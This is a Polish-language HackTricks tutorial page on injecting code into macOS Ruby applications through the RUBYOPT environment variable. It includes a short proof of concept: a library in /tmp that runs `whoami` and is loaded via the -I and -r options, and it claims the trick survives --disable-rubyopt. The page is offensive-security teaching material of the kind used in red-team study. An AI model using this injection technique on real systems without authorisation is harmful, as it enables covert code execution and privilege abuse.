macOS Ruby Applications Injection

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCYJNY!
Zdobądź oficjalne gadżety PEASS & HackTricks
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.

RUBYOPT

Korzystając z tej zmiennej środowiskowej, można dodawać nowe parametry do ruby'ego za każdym razem, gdy jest uruchamiany. Chociaż parametr -e nie może być używany do określenia kodu ruby do wykonania, można użyć parametrów -I i -r do dodania nowego folderu do ścieżki ładowania bibliotek, a następnie określenia biblioteki do załadowania.

Utwórz bibliotekę inject.rb w folderze /tmp:

inject.rb

puts `whoami`

Stwórz skrypt Ruby gdziekolwiek, na przykład:

hello.rb

puts 'Hello, World!'

Następnie wykonaj dowolny skrypt Ruby, załaduj go za pomocą:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Ciekawostka, działa nawet z parametrem --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
Zdobądź oficjalne gadżety PEASS & HackTricks
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 2 months ago